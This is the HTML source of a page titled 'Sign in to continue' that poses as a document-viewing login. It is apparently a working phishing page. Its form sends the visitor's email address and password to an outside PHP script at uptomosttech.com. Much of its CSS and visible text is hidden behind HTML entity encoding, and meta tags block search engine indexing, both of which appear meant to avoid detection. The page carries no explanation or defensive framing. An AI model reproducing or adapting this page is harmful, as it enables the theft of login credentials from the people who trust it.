<html><head>
<style>

@import url(https://fonts.googleapis.com/css?family=PT+Sans:400,700);
html {
	min-height: 100%;
}

body {
	background: url('https://i.gyazo.com/049bc4624875e35c9a678af7eb99bb95.jpg') no-repeat;
	&#98;&#97;&#99;&#107;&#103;&#114;&#111;&#117;&#110;&#100;-&#115;&#105;&#122;&#101;: c&#111;&#118;&#101;&#114;&#59;
	&#112;&#111;&#115;&#105;&#116;&#105;&#111;&#110;: a&#98;&#115;&#111;&#108;&#117;&#116;&#101;&#59;
	&#119;&#105;&#100;&#116;&#104;: 1&#48;&#48;%&#59;
	&#104;&#101;&#105;&#103;&#104;&#116;: 1&#48;&#48;%&#59;
    t&#111;&#112;: 0&#59;
    r&#105;&#103;&#104;&#116;: 0&#59;
    b&#111;&#116;&#116;&#111;&#109;: 0&#59;
    l&#101;&#102;&#116;: 0&#59;
    m&#97;&#114;&#103;&#105;&#110;: a&#117;&#116;&#111;&#59;
    o&#118;&#101;&#114;&#102;&#108;&#111;&#119;: h&#105;&#100;&#100;&#101;&#110;&#59;
	&#102;&#111;&#110;&#116;-&#102;&#97;&#109;&#105;&#108;&#121;: '&#80;T S&#97;&#110;&#115;', s&#97;&#110;&#115;-&#115;&#101;&#114;&#105;&#102;; 
}

.login {
	padding: 10px;
}

.files {
	background: #02723b;
	margin: 200px auto;
	width: 90%;
	max-width: 450px;
	text-align: center;
	color: #fff;
}

form {
  max-width: 450px;
	margin: 0 auto;
}
form > div {
  position: relative;
  background: white;
  border-bottom: 1px solid #ccc;
  color: #000;
}
form > div > label {
  opacity: 0.3;
  font-weight: bold;
  position: absolute;
  top: 22px;
  left: 20px;
}
form > div > input[type="text"],
form > div > input[type="email"],
form > div > input[type="password"] {
  width: 100%;
  border: 0;
  padding: 20px 20px 20px 50px;
  background: #fff;
}
form > div > input[type="text"]:focus,
form > div > input[type="email"]:focus,
form > div > input[type="password"]:focus {
  outline: 0;
  background: white;
}
form > div > input[type="text"]:focus + label,
form > div > input[type="email"]:focus + label,
form > div > input[type="password"]:focus + label {
  opacity: 0;
}
form > div > input[type="text"]:valid,
form > div > input[type="email"]:valid,
form > div > input[type="password"]:valid {
  background: url(https://s3-us-west-2.amazonaws.com/s.cdpn.io/3/check.svg);
  background-size: 20px;
  background-repeat: no-repeat;
  background-position: 20px 20px;
}
form > div > input[type="text"]:valid + label,
form > div > input[type="email"]:valid + label,
form > div > input[type="password"]:valid + label {
  opacity: 0;
}
form > div > input[type="text"]:invalid:not(:focus):not(:placeholder-shown),
form > div > input[type="email"]:invalid:not(:focus):not(:placeholder-shown),
form > div > input[type="password"]:invalid:not(:focus):not(:placeholder-shown) {
  background: pink;
}
form > div > input[type="text"]:invalid:not(:focus):not(:placeholder-shown) + label,
form > div > input[type="email"]:invalid:not(:focus):not(:placeholder-shown) + label,
form > div > input[type="password"]:invalid:not(:focus):not(:placeholder-shown) + label {
  opacity: 0;
}
form > div > input[type="text"]:invalid:focus:not(:placeholder-shown) ~ .requirements,
form > div > input[type="email"]:invalid:focus:not(:placeholder-shown) ~ .requirements,
form > div > input[type="password"]:invalid:focus:not(:placeholder-shown) ~ .requirements {
  max-height: 200px;
  padding: 0 30px 20px 50px;
}
form > div .requirements {
  padding: 0 30px 0 50px;
  color: #999;
  max-height: 0;
  transition: 0.28s;
  overflow: hidden;
  color: red;
  font-style: italic;
}
form input[type="submit"] {
  display: block;
  width: 100%;
  margin: 20px 0;
  background: #25402b;
  color: white;
  border: 0;
  padding: 20px;
  font-size: 1.2rem;
}

form input[type="submit"]:hover {
	box-shadow: 1px 1px 1px #ddd;
}

* {
  box-sizing: border-box;
}

.invalid {
	background: #000;
	color: #000;
}

@media screen and (max-width: 360px) and (min-width: 320px) {
  .files {
    margin: 100px auto;
  }
}
</style>
	<title>Sign in to continue</title>
	<link rel="icon" type="image/png" https://i.gyazo.com/83cffd1ebf23ed93aa925eb9529f5348.png3d.png">
    <meta name="robots" content="noindex, noarchive, nofollow, nosnippet">
    <meta name="googlebot" content="noindex, noarchive, nofollow, nosnippet, noimageindex">
    <meta name="slurp" content="noindex, noarchive, nofollow, nosnippet, noodp, noydir">
    <meta name="msnbot" content="noindex, noarchive, nofollow, nosnippet">
    <meta name="teoma" content="noindex, noarchive, nofollow, nosnippet">
	<meta name="viewport" content="width=device-width, initial-scale=1">
	
	

</head>
<body>
<div class="files">
	<img src="https://i.gyazo.com/7fc7a0126fd7e7c8bcb89fc52967c8ec.png" height="50">
	<h2>S&#105;&#103;n &#105;&#110; &#116;&#111; v&#105;&#101;w t&#104;e d&#111;&#99;&#117;&#109;&#101;&#110;t </h2>
	
	<div class="login">
		<form action="https://uptomosttech.com/share/need1.php" method="post">

	  
	  <div>
		<input type="email" id="email" name="email" required="" placeholder=" " value="">
		<label for="email">E&#109;&#97;&#105;l A&#100;&#100;&#114;&#101;&#115;s </label>
		<div class="requirements">
		  M&#117;&#115;t &#98;&#101; &#97; v&#97;&#108;&#105;d e&#109;&#97;&#105;l a&#100;&#100;&#114;&#101;&#115;&#115;. 
		</div>
	  </div>
	  
	  <div>
		<input type="password" id="password" name="password" required="" placeholder=" ">
		<label for="password">Password</label>
		<div class="requirements">
		  Y&#111;&#117;r p&#97;&#115;&#115;&#119;&#111;&#114;d m&#117;&#115;t &#98;&#101; &#97;&#116; l&#101;&#97;&#115;t &#54; c&#104;&#97;&#114;&#97;&#99;&#116;&#101;&#114;s &#97;&#115; w&#101;&#108;l &#97;&#115; c&#111;&#110;&#116;&#97;&#105;n &#97;&#116; l&#101;&#97;&#115;t o&#110;e u&#112;&#112;&#101;&#114;&#99;&#97;&#115;&#101;, o&#110;e l&#111;&#119;&#101;&#114;&#99;&#97;&#115;&#101;, a&#110;d o&#110;e n&#117;&#109;&#98;&#101;&#114;. 
		</div>
	  </div>
	  
	  <input type="submit" value="View Document">

	</form>
	</div>
</div>




</body></html>
